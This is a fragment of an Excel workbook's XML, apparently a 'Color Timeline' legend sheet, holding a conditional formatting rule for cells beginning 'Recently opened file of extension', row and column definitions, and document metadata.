    <cfRule type="beginsWith" dxfId="0" priority="74" operator="beginsWith" text="Recently opened file of extension">
      <formula>LEFT(K1,LEN("Recently opened file of extension"))="Recently opened file of extension"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7" sqref="A7"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15"/>
  <cols>
    <col min="1" max="1" width="26.7109375" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:1" s="1" customFormat="1">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="2" spans="1:1" s="2" customFormat="1">
      <c r="A2" s="2" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="3" spans="1:1" s="4" customFormat="1">
      <c r="A3" s="4" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="4" spans="1:1" s="5" customFormat="1">
      <c r="A4" s="5" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="5" spans="1:1" s="6" customFormat="1">
      <c r="A5" s="6" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="6" spans="1:1" s="3" customFormat="1">
      <c r="A6" s="3" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="7" spans="1:1" s="8" customFormat="1">
      <c r="A7" s="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Color Timeline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Gabriel Crepaldi</cp:lastModifiedBy>
  <cp:lastPrinted>2025-12-09T21:32:52Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-12-08T22:14:42Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-11T00:06:22Z</dcterms:modified>
</cp:coreProperties>
</file>